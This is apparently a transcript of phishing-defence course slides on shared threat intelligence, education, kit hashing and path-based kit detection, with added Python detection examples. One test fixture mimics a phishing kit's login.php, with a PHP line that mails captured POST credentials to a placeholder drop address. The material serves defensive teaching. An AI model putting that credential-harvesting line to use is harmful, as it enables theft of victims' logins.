techniques like this simply don’t move fast enough to handle the volume
and rapid pace of phishing attempts today.
As we've already discussed, emailing the owner of a domain is not only often ineffective but can also serve as a warning to the phisher that it is time to move to a new domain name. And manually digging through data to try to identify a phisher is slow, arduous, and rarely effective, because you only have the information that you have been able to gather yourself.
That typically isn't enough to identify attacks that could be identified by aggregating information from the other companies being phished.
Slide: 4
Section 6: Preventions + Solutions
What Does Work?
Valid Countermeasures
•	 Using Intelligence
•	 Shared Knowledge
•	 Automatic Responses
•	 Malware Analysis Results
•	 Internal Scanning
The best defense against phishing is to use the same valuable item that phishing attempts to gather: information.
By gathering intelligence on phishing attempts and taking appropriate action, you can head off as many phishing attempts as possible. But it requires different intelligence gathering than has commonly been used in the past. You need aggregated information from phishing attempts associated with your company as well as with others, and you need to be able to respond automatically to trends found in that aggregated data.
You need data that identifies email subjects, hostile URLs and hostile attachments, together with analysis of the actions performed by the malware used directly and by any additional malware dropped or used by the attack, and you need to be able to combine all of this intelligence with your own internal scanning results.
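The combination the slide describes (shared indicators, automatic response, internal scanning) as an added example in Python. This is not course material or Malcovery code: the feed names, brands, log lines, hostnames and hashes are all constructed, and the "two independent sources before acting automatically" rule is an assumption chosen for the example.

```python
"""Added example: merge phishing indicators from several organisations, de-duplicate
them, and check an internal mail log against the merged set so that a confirmed hit
can trigger an automatic response. Everything below is constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, urlunsplit

# Constructed indicator feeds: (kind, value, brand). "ours" is what we saw ourselves;
# partner_a / partner_b are hypothetical peers sharing their phishing data.
FEEDS = {
    "ours": [
        ("url", "http://Example-Bank-Login.invalid/cib/index.htm", "ExampleBank"),
        ("subject", "Your account has been limited", "ExampleBank"),
    ],
    "partner_a": [
        ("url", "http://example-bank-login.invalid/cib/index.htm/", "ExampleBank"),
        ("sha256", "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", "ExampleBank"),
    ],
    "partner_b": [
        ("url", "http://free-vouchers.invalid/wp-admin/promo.php", "ExampleShop"),
        ("sha256", "9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08", "ExampleShop"),
    ],
}

# Constructed internal mail-gateway log lines, one message each.
MAIL_LOG = [
    '2013-06-12T10:01:02 msgid=1 from=alerts@example-bank-login.invalid '
    'subject="Your Account Has Been Limited" url=http://EXAMPLE-BANK-LOGIN.invalid/cib/index.htm',
    '2013-06-12T10:03:45 msgid=2 from=promo@free-vouchers.invalid '
    'subject="Free voucher inside" url=http://free-vouchers.invalid/wp-admin/promo.php',
    '2013-06-12T10:05:10 msgid=3 from=hr@corp.invalid subject="Q2 timesheets" '
    'sha256=9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08',
    '2013-06-12T10:07:22 msgid=4 from=it@corp.invalid subject="Maintenance window tonight"',
]

LOG_RE = re.compile(
    r'subject="(?P<subject>[^"]*)"(?: url=(?P<url>\S+))?(?: sha256=(?P<sha256>[0-9a-fA-F]{64}))?'
)
# Automatic action per indicator kind once an indicator is confirmed.
AUTO_ACTION = {"url": "block_url", "sha256": "quarantine", "subject": "quarantine"}


def normalize(kind, value):
    """Canonicalise an indicator so the same artefact reported twice collapses to one key."""
    value = value.strip()
    if kind == "url":
        p = urlsplit(value)
        path = p.path.rstrip("/") or "/"
        return urlunsplit((p.scheme.lower(), p.netloc.lower(), path, p.query, ""))
    if kind == "sha256":
        return value.lower()
    return re.sub(r"\s+", " ", value).lower()      # subjects: collapse whitespace, case-fold


def aggregate(feeds):
    """Merge all feeds into {(kind, canonical value): {"sources": set, "brands": set}}."""
    agg = defaultdict(lambda: {"sources": set(), "brands": set()})
    for source, items in feeds.items():
        for kind, value, brand in items:
            entry = agg[(kind, normalize(kind, value))]
            entry["sources"].add(source)
            entry["brands"].add(brand)
    return dict(agg)


def scan_log(agg, lines):
    """Match each log line against the aggregated indicators. An indicator seen by two or
    more independent sources gets the automatic action; a single-source one is only
    flagged for analyst review (assumed policy for this example)."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        for kind in ("url", "sha256", "subject"):
            raw = m.group(kind)
            hit = agg.get((kind, normalize(kind, raw))) if raw else None
            if hit is None:
                continue
            confirmed = len(hit["sources"]) >= 2
            findings.append({
                "line": line, "indicator": kind,
                "brands": sorted(hit["brands"]), "sources": sorted(hit["sources"]),
                "action": AUTO_ACTION[kind] if confirmed else "review",
            })
    return findings


def run():
    return scan_log(aggregate(FEEDS), MAIL_LOG)


if __name__ == "__main__":
    for f in run():
        print(f"{f['action']:10} {f['indicator']:8} {f['brands']} <- {f['line'][:60]}")
```

The kit URL is written three different ways across the feeds and the log; canonicalising scheme, host and trailing slash is what makes "ours" and "partner_a" count as two confirmations and lets the log line match at all. The same attachment hash reported by two partners under different brands is quarantined even though nobody in our own organisation has reported it yet.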
Slide: 5
Section 6: Preventions + Solutions
What Does Work?
Educate, educate, educate!
•	 Teach your employees
•	 Teach your customers
Finally, one of the best non-technical defenses is education. You need to teach others in your organization about phishing and about its impact.
This education needs to be given to every employee, so that they know what phishing is and how dangerous it can be. In addition, teach your customers about phishing! When phishing emails are circulating about your brand, make sure that your customers are aware of them, and that phishing targets everyone, not just your company.
Your customers' perception of your company is a major factor in your reputation, and by educating your customers you can help maintain a positive one. Then, the next time a customer is hit with a phishing attempt targeting your brand, they can correctly blame the phisher, not you.
Slide: 6
Section 6: Preventions + Solutions
What Does Work?
Preventing Vulnerabilities Being Exploited (of course!)
Firm up defenses against:
•	 Password brute-forcing
•	 Vulnerable applications
•	 Failure to patch websites
Web application vulnerability scanning tools like Acunetix, OpenVAS, Nikto, Nessus or Qualys will help you understand possible vulnerabilities, but they won't do much to flag phishing attacks themselves.
Web scanning tools help prevent your web server from becoming a phishing springboard, but they won't fix or ease phishing attacks against your brand.
Slide: 7
Section 6: Preventions + Solutions
Malcovery: Cyber Intelligence & Forensics System Architecture
The Malcovery Cyber Intelligence & Forensics System Architecture is a cloud-based software and services technology which works off the Malcovery Threat Database.
This database receives feeds from various proprietary and public sources; these provide the data on which the intelligence and forensic activities are based. One part of the process, the Malcovery Spam Data Mine, has the technology to analyze approximately one million emails per day and to extract, count, and de-duplicate any new URLs, which are then scanned and indexed. The collection currently holds over 500 million spam emails and grows by more than one million emails per day, allowing the platform to respond to queries about a wide range of email-based crimes and to build unique intelligence reports and data.
Because phishing emails are generated programmatically, the emails can be processed with tools. The Malcovery platform auto-classifies about 65% of the scanned phishing URLs, which means that within seconds of seeing a URL for the first time, the system has fetched it, confirmed it, and assigned a brand to it. URLs which cannot be automatically classified are presented to the Operations Team for human classification. When a phishing attack is classified, the pattern is learned by the system automatically and can be matched in the future. When the Operations Team confirms a phish and labels it with a brand, that pattern becomes part of a collection of "known phishing patterns" stored in the MCIF database.
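The "extract, count, and de-duplicate new URLs" step of a spam data mine, as an added example in Python. It is not Malcovery's code and makes no claim about how their platform does this: raw messages are parsed with the standard library, every URL in the text and HTML parts is canonicalised, tallied across the batch, and only URLs not already indexed are returned. The sample messages and hostnames are constructed.

```python
"""Added example (not Malcovery's implementation): URL extraction, counting and
de-duplication over a batch of raw spam messages. All messages are constructed."""
import re
from email import message_from_string, policy
from urllib.parse import urlsplit, urlunsplit

URL_RE = re.compile(r"""(?i)\b(?:https?://|www\.)[^\s<>"')\]]+""")


def canonical(url):
    """Lower-case scheme and host, drop fragment and trailing slash, strip sentence
    punctuation, so one landing page written several ways counts as one URL."""
    if url.lower().startswith("www."):
        url = "http://" + url
    p = urlsplit(url.rstrip(".,;"))
    path = p.path.rstrip("/") or "/"
    return urlunsplit((p.scheme.lower(), p.netloc.lower(), path, p.query, ""))


def urls_in_message(raw):
    """Set of canonical URLs in the text/plain and text/html parts of one message.
    Scanning the raw HTML also catches href targets that differ from the visible link text."""
    msg = message_from_string(raw, policy=policy.default)
    found = set()
    for part in msg.walk():
        if part.get_content_type() in ("text/plain", "text/html"):
            found.update(canonical(m.group(0)) for m in URL_RE.finditer(part.get_content()))
    return found


class SpamDataMine:
    """Remembers every URL already indexed and reports only the new ones per batch."""

    def __init__(self):
        self.seen = set()

    def ingest(self, raw_messages):
        """Return {new canonical URL: number of messages in this batch that carried it}."""
        counts = {}
        for raw in raw_messages:
            for url in urls_in_message(raw):          # per-message set: one vote per message
                counts[url] = counts.get(url, 0) + 1
        new = {u: c for u, c in counts.items() if u not in self.seen}
        self.seen.update(new)
        return new


# Constructed batch: the same kit URL appears three times, written three ways.
BATCH_1 = [
    "From: alerts@example-bank-login.invalid\nSubject: Account limited\n"
    "Content-Type: text/plain\n\n"
    "Please verify at http://Example-Bank-Login.invalid/cib/index.htm.\n",
    "From: alerts@example-bank-login.invalid\nSubject: Account limited\n"
    'Content-Type: multipart/alternative; boundary="b1"\n\n'
    "--b1\nContent-Type: text/plain\n\nSee the HTML version.\n"
    "--b1\nContent-Type: text/html\n\n"
    '<a href="http://example-bank-login.invalid/cib/index.htm/">www.example-bank.invalid</a>\n'
    "--b1--\n",
    "From: promo@free-vouchers.invalid\nSubject: Free voucher\nContent-Type: text/plain\n\n"
    "Claim: http://free-vouchers.invalid/wp-admin/promo.php or "
    "http://example-bank-login.invalid/cib/index.htm\n",
]
# A later batch: one already-indexed URL and one never seen before.
BATCH_2 = [
    "From: alerts@example-bank-login.invalid\nSubject: Account limited\nContent-Type: text/plain\n\n"
    "http://example-bank-login.invalid/cib/index.htm and http://new-lure.invalid/login\n",
]

if __name__ == "__main__":
    mine = SpamDataMine()
    print(mine.ingest(BATCH_1))   # three new URLs, the kit URL counted 3 times
    print(mine.ingest(BATCH_2))   # only the never-seen lure comes back
```

Counting per message rather than per occurrence keeps one spammy message from inflating a URL's tally, and the canonical form is what the scanner should fetch; the display text of the anchor (a look-alike of the real bank domain) is extracted as well because, on a phishing page, that mismatch between visible text and href is itself a useful signal.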
Slide: 8
Section 6: Preventions + Solutions
"Phishing kit" duplication prevention
As we saw earlier, most phishing sites are created by uploading, and then unpacking, a "phishing kit", typically a zipped folder containing the contents of the fake website.
The Malcovery solution hashes each HTML, JPG, CSS, GIF, JS, etc. file that makes up the fake website.
Their Phishing Intelligence system can then very quickly and reliably determine whether a NEW site matches a previously learned pattern, and therefore find identical scams in the wild. This helps, of course, to protect your brand or your clients' brands.
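Per-file hashing of a fetched site and matching against learned kits, as an added example. This is not Malcovery's implementation; the file contents are constructed stand-ins for real kit files, the kit label is invented, and the "60% of the known kit's files present" threshold is an assumption for the example.

```python
"""Added example (not Malcovery's code): fingerprint a fetched phishing site by hashing
each file it serves and compare the hash set with previously learned kits."""
import hashlib


def hash_files(files):
    """files: {relative path: bytes}. SHA-256 of every file (HTML, PHP, CSS, JS, images),
    ignoring paths so a kit unpacked in a different directory gives the same set."""
    return frozenset(hashlib.sha256(data).hexdigest() for data in files.values())


class KitIndex:
    """Known kits as hash sets; a new site matches a kit when enough of that kit's
    files are found byte-for-byte on it."""

    def __init__(self, threshold=0.6):          # threshold is an assumed value
        self.kits = {}                          # label -> frozenset of file hashes
        self.threshold = threshold

    def learn(self, label, files):
        self.kits[label] = hash_files(files)

    def match(self, files):
        """Best (label, coverage) over known kits, or None. Coverage is the share of the
        known kit's files present on the new site: extra files on the new site do not
        dilute the score, but every file the phisher edited drops it."""
        site = hash_files(files)
        best = None
        for label, known in self.kits.items():
            coverage = len(site & known) / len(known)
            if coverage >= self.threshold and (best is None or coverage > best[1]):
                best = (label, coverage)
        return best


# Constructed kit: the four files a confirmed ExampleBank phish served.
KIT_EXAMPLEBANK = {
    "index.htm": b"<html><form action=login.php><input name=user><input name=pass></form>",
    "login.php": b"<?php mail('drop@mailbox.invalid', 'cib', print_r($_POST, true)); ?>",
    "style.css": b"body{font-family:Arial} .cib{color:#c00}",
    "logo.gif":  b"GIF89a\x01\x00\x01\x00\x80\x00\x00",
}
# Same kit re-uploaded elsewhere, with only the drop mailbox in login.php changed.
SITE_SAME_KIT = {**KIT_EXAMPLEBANK,
                 "login.php": b"<?php mail('other@mailbox.invalid', 'cib', print_r($_POST, true)); ?>"}
# An unrelated site with nothing in common.
SITE_UNRELATED = {"verify.php": b"<?php header('Location: /');", "app.js": b"console.log(1)"}


def demo():
    index = KitIndex()
    index.learn("ExampleBank kit v1", KIT_EXAMPLEBANK)
    return index.match(SITE_SAME_KIT), index.match(SITE_UNRELATED)


if __name__ == "__main__":
    print(demo())   # (('ExampleBank kit v1', 0.75), None)
```

Exact hashes catch the common case of a kit re-uploaded untouched apart from the drop mailbox, but a phisher who re-saves every file with a one-byte change defeats them; that is why the slides pair file hashing with the directory-layout patterns described on the next slides.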
Slide: 9
Section 6: Preventions + Solutions
One of these things is not like the others...
Through analysis of more than 550,000 confirmed phishing sites, the Malcovery PhishIQ system has become very good at determining which things belong together.
Detecting phishing activity can be tedious at best and difficult at all times. Malcovery offers a solution through its PhishIQ technology, which has analyzed those 550,000-plus confirmed phishing sites and identified hundreds of thousands of patterns that alert clients to phishing risks.
Slide: 10
Section 6: Preventions + Solutions
Kits have predictable paths
Phishing kits have predictable paths.
For example, when we unzip a file, it places its contents based on the directory structure in the ZIP file.
So "/cibadministrator/index.htm" is likely from one kit, while "/cibc/cibc/PreSignOn.cibc.htm" is from another, and "/cibonline/" and "/cibc.com/" are likely from yet other phishing kits.
Because phishing kits are reused so widely, pattern detection software is the most robust way to protect clients from phishing attacks.
Malcovery PhishIQ receives tens of thousands of potentially harmful phishing sites per day. Each of these is retrieved, evaluated, "branded," and clustered in real time.
Malcovery PhishIQ
Slide: 11
Section 6: Preventions + Solutions
"wp-admin"
A number of vulnerabilities, configuration errors, and poor password choices make WordPress sites very easy to compromise. In fact, one of the most common paths seen in both phishing and malware sites is "wp-admin", something which the Malcovery Intelligence & Forensics (MCIF) System Architecture is very good at detecting. The path itself is not malicious; it tells you the phishing page is hosted inside a compromised WordPress installation rather than on a domain the phisher registered, which changes who you contact to get it taken down.
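The two path ideas from the last slides, clustering URLs by the directory layout a kit unpacks to and flagging URLs hosted inside a WordPress install, as one added example. It is not Malcovery's code: the four kit paths are the ones quoted on the "predictable paths" slide, while the hostnames, kit labels, extra URLs and the learn-from-a-confirmed-phish step are constructed for the example.

```python
"""Added example (not Malcovery's implementation): cluster phishing URLs by kit
directory layout, flag those inside a WordPress install, and learn a new layout
from a freshly confirmed phish. Hostnames and kit labels are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit


def directory_of(url):
    """'/images/update/verify.php' -> 'images/update/': the directory a phish page lives in."""
    path = urlsplit(url).path
    return path.rsplit("/", 1)[0].strip("/") + "/"


class PathClassifier:
    WORDPRESS = re.compile(r"(?:^|/)(?:wp-admin|wp-content|wp-includes)/")

    def __init__(self):
        self.signatures = []      # (kit label, regex over the URL path)

    def learn(self, label, kit_path):
        """kit_path is the path as the kit lays it out ('cibonline/' or one specific file).
        The kit may be unpacked under any parent directory on the compromised host, so
        the signature is anchored at a '/' boundary rather than at the start of the path."""
        if not kit_path.strip("/"):
            raise ValueError("kit path needs at least one directory or file component")
        self.signatures.append((label, re.compile(r"(?:^|/)" + re.escape(kit_path))))

    def classify(self, url):
        path = urlsplit(url).path
        kit = next((label for label, rx in self.signatures if rx.search(path)), None)
        return {"url": url, "kit": kit, "on_wordpress": bool(self.WORDPRESS.search(path))}

    def cluster(self, urls):
        groups = defaultdict(list)
        for url in urls:
            groups[self.classify(url)["kit"] or "unclassified"].append(url)
        return dict(groups)


# Kit layouts quoted on the slide; the labels are constructed.
KNOWN_KITS = [
    ("kit-A", "cibadministrator/"),
    ("kit-B", "cibc/cibc/PreSignOn.cibc.htm"),
    ("kit-C", "cibonline/"),
    ("kit-D", "cibc.com/"),
]

# Constructed feed of newly seen phishing URLs.
SAMPLE_URLS = [
    "http://host1.invalid/cibadministrator/index.htm",
    "http://host2.invalid/wp-content/uploads/cibadministrator/index.htm",
    "http://host3.invalid/cibc/cibc/PreSignOn.cibc.htm",
    "http://host4.invalid/wp-admin/cibonline/",
    "http://host5.invalid/cibc.com/login.php",
    "http://host6.invalid/images/update/verify.php",
]


def demo():
    pc = PathClassifier()
    for label, kit_path in KNOWN_KITS:
        pc.learn(label, kit_path)
    before = pc.cluster(SAMPLE_URLS)
    # An analyst confirms host6 is a phish: learn its layout so the next copy clusters on its own.
    pc.learn("kit-E", directory_of(SAMPLE_URLS[5]))
    after = pc.cluster(SAMPLE_URLS)
    return pc, before, after


if __name__ == "__main__":
    _, before, after = demo()
    print(before)
    print(after)
```

host1 and host2 land in the same cluster even though one kit sits at the web root and the other under wp-content/uploads, which is exactly the "predictable path" point; host2 and host4 are additionally marked as living on WordPress installs, so the takedown request goes to the site owner or host rather than to a registrar.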
Slide: 1
Section 7: Summary
Section 7
Summary
Slide: 2
Section 7: Summary
In Summary
•	 Traditional protection techniques are ineffective
•	 Phishing is easy and effective
•	 Phishing gathers information that can be used for a variety of purposes
•	 A variety of techniques are used to phish and camouflage the phisher
•	 Intelligence gathering, automated response, and education are the best defenses against phishing
The final three take-away points are these:
While phishing is an "old-fashioned" cyber security threat, attacks continue to increase.
Corporations and their customers are continuing to experience phishing and malicious spam attacks. In fact, it's happening more than ever before. 37.3 million users experienced phishing attacks in 2013, an increase of over 87% in one year.
The stakes are high for cybercrime victims.
Banking/financial institutions, commerce companies, universities, etc. are frequent victims of cyber attacks, which are a form of cybercrime. Remediation costs and long-term loss of brand loyalty hurt the company's bottom line. It is estimated that one of every 200 phishing attacks is successful. The average cost of a phishing attack is upwards of $150,000 to the organization. Those are significant costs.
Traditional methods simply aren't working.
Despite multiple layers of cybercrime defense and prevention, technologies and services such as end user education and training about phishing and spam, web filters, web gateway blacklists and take-down vendors aren't working. Corporations and organizations continue to experience significant losses to malware, phishing, and other forms of cybercrime. The reason? Victims of phishing and malware have not been able to identify who the criminals are or the scope of the damages they cause.

More Related Content

What's hot (20)

Teaching Your Staff About Phishing
Teaching Your Staff About PhishingTeaching Your Staff About Phishing
Teaching Your Staff About Phishing
 
PHISHING PROTECTION
 PHISHING PROTECTION PHISHING PROTECTION
PHISHING PROTECTION
 
Cyber security.docx
Cyber security.docxCyber security.docx
Cyber security.docx
 
Phishing
PhishingPhishing
Phishing
 
Cyber security certification course
Cyber security certification courseCyber security certification course
Cyber security certification course
 
PPT on Phishing
PPT on PhishingPPT on Phishing
PPT on Phishing
 
Phishing Presentation
Phishing Presentation Phishing Presentation
Phishing Presentation
 
Cyber Privacy & Password Protection
Cyber Privacy & Password ProtectionCyber Privacy & Password Protection
Cyber Privacy & Password Protection
 
Phishing demo
Phishing demoPhishing demo
Phishing demo
 
Phishing
PhishingPhishing
Phishing
 
Phishing
PhishingPhishing
Phishing
 
Phishing Attacks
Phishing AttacksPhishing Attacks
Phishing Attacks
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTION
 
Axxera End Point Security Protection
Axxera End Point Security ProtectionAxxera End Point Security Protection
Axxera End Point Security Protection
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
 
Phishing attack seminar presentation
Phishing attack seminar presentation Phishing attack seminar presentation
Phishing attack seminar presentation
 
Technology Training - Security, Passwords & More
Technology Training - Security, Passwords & MoreTechnology Training - Security, Passwords & More
Technology Training - Security, Passwords & More
 
Security Awareness Training from KnowBe4
Security Awareness Training from KnowBe4Security Awareness Training from KnowBe4
Security Awareness Training from KnowBe4
 
Computer Security for Lawyers
Computer Security for LawyersComputer Security for Lawyers
Computer Security for Lawyers
 
Phishing ppt
Phishing pptPhishing ppt
Phishing ppt
 

Similar to How To Catch a Phish: User Awareness and Training

Email phishing: Text classification using natural language processing
Email phishing: Text classification using natural language processingEmail phishing: Text classification using natural language processing
Email phishing: Text classification using natural language processingCSITiaesprime
 
Phishing website method
Phishing website methodPhishing website method
Phishing website methodarelyf_7
 
Lesson iv on fraud awareness (cyber frauds)
Lesson  iv on fraud awareness   (cyber frauds)Lesson  iv on fraud awareness   (cyber frauds)
Lesson iv on fraud awareness (cyber frauds)Kolluru N Rao
 
Lesson iv on fraud awareness (cyber frauds)
Lesson  iv on fraud awareness   (cyber frauds)Lesson  iv on fraud awareness   (cyber frauds)
Lesson iv on fraud awareness (cyber frauds)CA.Kolluru Narayanarao
 
Cybercrime - An essential guide from Thawte
Cybercrime - An essential guide from ThawteCybercrime - An essential guide from Thawte
Cybercrime - An essential guide from ThawteRapidSSLOnline.com
 
Research Paper on Spreading Awareness About Phishing Attack Is Effective In R...
Research Paper on Spreading Awareness About Phishing Attack Is Effective In R...Research Paper on Spreading Awareness About Phishing Attack Is Effective In R...
Research Paper on Spreading Awareness About Phishing Attack Is Effective In R...IRJET Journal
 
ICT-phishing
ICT-phishingICT-phishing
ICT-phishingMH BS
 
E Mail Phishing Prevention and Detection
E Mail Phishing Prevention and DetectionE Mail Phishing Prevention and Detection
E Mail Phishing Prevention and Detectionijtsrd
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresIRJET Journal
 
Education 2.0 Reviews Phishing Scams Targeting Students To Protect Their Info...
Education 2.0 Reviews Phishing Scams Targeting Students To Protect Their Info...Education 2.0 Reviews Phishing Scams Targeting Students To Protect Their Info...
Education 2.0 Reviews Phishing Scams Targeting Students To Protect Their Info...Education 2Conf
 
December 2019 Part 10
December 2019 Part 10December 2019 Part 10
December 2019 Part 10seadeloitte
 
Internet 2.0 Conference Reviews Legit Ways To Spot Phishing Scam Offenses.pptx
Internet 2.0 Conference Reviews Legit Ways To Spot Phishing Scam Offenses.pptxInternet 2.0 Conference Reviews Legit Ways To Spot Phishing Scam Offenses.pptx
Internet 2.0 Conference Reviews Legit Ways To Spot Phishing Scam Offenses.pptxInternet 2Conf
 
Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingSachin Saini
 
Customer Involvement in Phishing Defence
Customer Involvement in Phishing DefenceCustomer Involvement in Phishing Defence
Customer Involvement in Phishing DefenceJordan Schroeder
 
negative implications of IT
negative implications of ITnegative implications of IT
negative implications of ITMahdiRahmani15
 
A Novel Approach for Phishing Emails Real Time Classification Using K-Means A...
A Novel Approach for Phishing Emails Real Time Classification Using K-Means A...A Novel Approach for Phishing Emails Real Time Classification Using K-Means A...
A Novel Approach for Phishing Emails Real Time Classification Using K-Means A...IJECEIAES
 

Similar to How To Catch a Phish: User Awareness and Training (20)

Email phishing: Text classification using natural language processing
Email phishing: Text classification using natural language processingEmail phishing: Text classification using natural language processing
Email phishing: Text classification using natural language processing
 
Phishing technology
Phishing technologyPhishing technology
Phishing technology
 
Phishing technology
Phishing technologyPhishing technology
Phishing technology
 
Phishing technology
Phishing technologyPhishing technology
Phishing technology
 
Phishing website method
Phishing website methodPhishing website method
Phishing website method
 
Lesson iv on fraud awareness (cyber frauds)
Lesson  iv on fraud awareness   (cyber frauds)Lesson  iv on fraud awareness   (cyber frauds)
Lesson iv on fraud awareness (cyber frauds)
 
Lesson iv on fraud awareness (cyber frauds)
Lesson  iv on fraud awareness   (cyber frauds)Lesson  iv on fraud awareness   (cyber frauds)
Lesson iv on fraud awareness (cyber frauds)
 
Phishing
PhishingPhishing
Phishing
 
Cybercrime - An essential guide from Thawte
Cybercrime - An essential guide from ThawteCybercrime - An essential guide from Thawte
Cybercrime - An essential guide from Thawte
 
Research Paper on Spreading Awareness About Phishing Attack Is Effective In R...
Research Paper on Spreading Awareness About Phishing Attack Is Effective In R...Research Paper on Spreading Awareness About Phishing Attack Is Effective In R...
Research Paper on Spreading Awareness About Phishing Attack Is Effective In R...
 
ICT-phishing
ICT-phishingICT-phishing
ICT-phishing
 
E Mail Phishing Prevention and Detection
E Mail Phishing Prevention and DetectionE Mail Phishing Prevention and Detection
E Mail Phishing Prevention and Detection
 
Phishing: Analysis and Countermeasures
Phishing: Analysis and CountermeasuresPhishing: Analysis and Countermeasures
Phishing: Analysis and Countermeasures
 
Education 2.0 Reviews Phishing Scams Targeting Students To Protect Their Info...
Education 2.0 Reviews Phishing Scams Targeting Students To Protect Their Info...Education 2.0 Reviews Phishing Scams Targeting Students To Protect Their Info...
Education 2.0 Reviews Phishing Scams Targeting Students To Protect Their Info...
 
December 2019 Part 10
December 2019 Part 10December 2019 Part 10
December 2019 Part 10
 
Internet 2.0 Conference Reviews Legit Ways To Spot Phishing Scam Offenses.pptx
Internet 2.0 Conference Reviews Legit Ways To Spot Phishing Scam Offenses.pptxInternet 2.0 Conference Reviews Legit Ways To Spot Phishing Scam Offenses.pptx
Internet 2.0 Conference Reviews Legit Ways To Spot Phishing Scam Offenses.pptx
 
Phishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS WorkingPhishing attack, with SSL Encryption and HTTPS Working
Phishing attack, with SSL Encryption and HTTPS Working
 
Customer Involvement in Phishing Defence
Customer Involvement in Phishing DefenceCustomer Involvement in Phishing Defence
Customer Involvement in Phishing Defence
 
negative implications of IT
negative implications of ITnegative implications of IT
negative implications of IT
 
A Novel Approach for Phishing Emails Real Time Classification Using K-Means A...
A Novel Approach for Phishing Emails Real Time Classification Using K-Means A...A Novel Approach for Phishing Emails Real Time Classification Using K-Means A...
A Novel Approach for Phishing Emails Real Time Classification Using K-Means A...
 

More from London School of Cyber Security

Website Impersonation Attacks. Who is REALLY Behind That Mask?
Website Impersonation Attacks. Who is REALLY Behind That Mask?Website Impersonation Attacks. Who is REALLY Behind That Mask?
Website Impersonation Attacks. Who is REALLY Behind That Mask?London School of Cyber Security
 
Changing the Mindset: Creating a Risk-Conscious Culture - Hacker Hotshots
Changing the Mindset: Creating a Risk-Conscious Culture - Hacker HotshotsChanging the Mindset: Creating a Risk-Conscious Culture - Hacker Hotshots
Changing the Mindset: Creating a Risk-Conscious Culture - Hacker HotshotsLondon School of Cyber Security
 

More from London School of Cyber Security (17)

The Panama Papers Hack
The Panama Papers HackThe Panama Papers Hack
The Panama Papers Hack
 
ISIS and Cyber Terrorism
ISIS and Cyber TerrorismISIS and Cyber Terrorism
ISIS and Cyber Terrorism
 
Silk Road & Online Narcotic Distribution
Silk Road & Online Narcotic DistributionSilk Road & Online Narcotic Distribution
Silk Road & Online Narcotic Distribution
 
Ashely Madison Hack
Ashely Madison HackAshely Madison Hack
Ashely Madison Hack
 
Advanced Threat Detection in ICS – SCADA Environments
Advanced Threat Detection in ICS – SCADA EnvironmentsAdvanced Threat Detection in ICS – SCADA Environments
Advanced Threat Detection in ICS – SCADA Environments
 
What Everybody Ought to Know About PCI DSS and PA-DSS
What Everybody Ought to Know About PCI DSS and PA-DSSWhat Everybody Ought to Know About PCI DSS and PA-DSS
What Everybody Ought to Know About PCI DSS and PA-DSS
 
Building an Effective Cyber Intelligence Program
Building an Effective Cyber Intelligence ProgramBuilding an Effective Cyber Intelligence Program
Building an Effective Cyber Intelligence Program
 
Crowdsourced Vulnerability Testing
Crowdsourced Vulnerability TestingCrowdsourced Vulnerability Testing
Crowdsourced Vulnerability Testing
 
Memory forensics and incident response
Memory forensics and incident responseMemory forensics and incident response
Memory forensics and incident response
 
Gauntlt Rugged By Example
Gauntlt Rugged By ExampleGauntlt Rugged By Example
Gauntlt Rugged By Example
 
Application Hackers Have A Handbook. Why Shouldn't You?
Application Hackers Have A Handbook. Why Shouldn't You?Application Hackers Have A Handbook. Why Shouldn't You?
Application Hackers Have A Handbook. Why Shouldn't You?
 
Website Impersonation Attacks. Who is REALLY Behind That Mask?
Website Impersonation Attacks. Who is REALLY Behind That Mask?Website Impersonation Attacks. Who is REALLY Behind That Mask?
Website Impersonation Attacks. Who is REALLY Behind That Mask?
 
Sploitego
SploitegoSploitego
Sploitego
 
Legal Issues in Mobile Security Research
Legal Issues in Mobile Security ResearchLegal Issues in Mobile Security Research
Legal Issues in Mobile Security Research
 
Blind XSS
Blind XSSBlind XSS
Blind XSS
 
Changing the Mindset: Creating a Risk-Conscious Culture - Hacker Hotshots
Changing the Mindset: Creating a Risk-Conscious Culture - Hacker HotshotsChanging the Mindset: Creating a Risk-Conscious Culture - Hacker Hotshots
Changing the Mindset: Creating a Risk-Conscious Culture - Hacker Hotshots
 
Sploitego
SploitegoSploitego
Sploitego
 

Recently uploaded

Final demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxFinal demo Grade 9 for demo Plan dessert.pptx
Final demo Grade 9 for demo Plan dessert.pptxAvyJaneVismanos
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions  for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions  for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxVS Mahajan Coaching Centre
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17Celine George
 
EPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptxEPANDING THE CONTENT OF AN OUTLINE using notes.pptx
EPANDING THE CONTENT OF AN OUTLINE using notes.pptxRaymartEstabillo3
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdfssuser54595a
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
